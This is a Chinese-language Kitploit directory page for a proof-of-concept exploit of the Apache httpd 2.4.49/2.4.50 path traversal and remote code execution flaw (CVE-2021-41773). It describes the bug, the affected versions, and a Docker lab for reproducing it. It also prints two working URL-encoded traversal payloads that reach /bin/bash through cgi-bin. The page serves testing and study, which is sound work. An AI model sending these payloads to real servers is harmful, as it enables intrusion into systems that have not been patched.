Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2021-41773-v- — Proof-of-concept exploit for Apache HTTP Server 2.4.49/2.4.50 路径遍历漏洞 (CVE-2021-41773),通过 CGI 脚本实现远程代码执行。包含基于 Docker 的复现环境和 Python 漏洞利用脚本。 | Kitploit
工具/GitHubGitHub/mightysai1997/cve-2021-41773-v-
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubmightysai1997/cve-2021-41773-v-

cve-2021-41773-v-

Proof-of-concept exploit for Apache HTTP Server 2.4.49/2.4.50 路径遍历漏洞 (CVE-2021-41773),通过 CGI 脚本实现远程代码执行。包含基于 Docker 的复现环境和 Python 漏洞利用脚本。

查看仓库
3年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Apache httpd 远程代码执行

在 Apache HTTP Server 2.4.49 的路径规范化修改中发现了一个缺陷。攻击者可以利用路径遍历攻击将 URL 映射到由类似 Alias 指令配置的目录之外的文件。如果这些目录之外的文件没有受默认配置 "require all denied" 保护,则这些请求可能成功。此外,如果还为这些别名路径启用了 CGI 脚本,则可能导致远程代码执行。此问题已知在野外被利用。此问题仅影响 Apache 2.4.49,不影响较早版本。Apache HTTP Server 2.4.50 中的修复不完整,请参见 CVE-2021-42013。

  • CVE 详情
  • 来源

受影响版本

  • 2.4.49
  • 2.4.50

修复版本

  • 2.4.51

先决条件

  • podman(或将 podman 别名为 docker)
  • python3 和 pip3
  • colorama(使用 pip3 install colorama 安装的 Python 库)

文件

  • httpd.conf 默认的 Apache 配置(已启用 CGI 模块)
  • hello.pl 在容器中运行的示例 hello-world perl CGI 脚本
  • main.py 示例漏洞利用 Python 脚本

复现

以 docker/podman 容器启动存在漏洞的 Apache httpd(使用默认配置)。

Dockerfile容器版本
Dockerfile2449vulnapache24492.4.49
Dockerfile2450vulnapache24502.4.50
  1. 构建两个容器镜像 1.1 chmod +x ./build.sh 1.2 ./build.sh
  2. 启动存在漏洞的 Apache httpd 容器 2.1 chmod +x ./run.sh 2.2 ./run.sh
  3. 验证 Web 服务器正在运行 3.1 curl localhost:2449/cgi-bin/hello.pl 3.2 curl localhost:2450/cgi-bin/hello.pl
容器监听端口
vulnapache24492449
vulnapache24502450
  1. 运行漏洞利用脚本 1.1 python3 main.py localhost:4249 1.2 选择针对 2.4.49 版本的攻击 1.3 python3 main.py localhost:2450 1.4 选择针对 2.4.50 版本的攻击

利用示例

说明

该漏洞利用将利用 Apache httpd 的 CGI 模块,通过路径遍历允许执行任意可执行文件。

  • /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
  • /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash

.%2e/ 是 URL 编码的,解码后等于 ../。 .%%32%65 是双重 URL 编码的,解码后也等于 ../。

致谢

  • 漏洞利用作者:Valentin Lobstein
  • 软件链接:https://github.com/Balgogan/CVE-2021-41773
  • Lucas Schnell
下载工具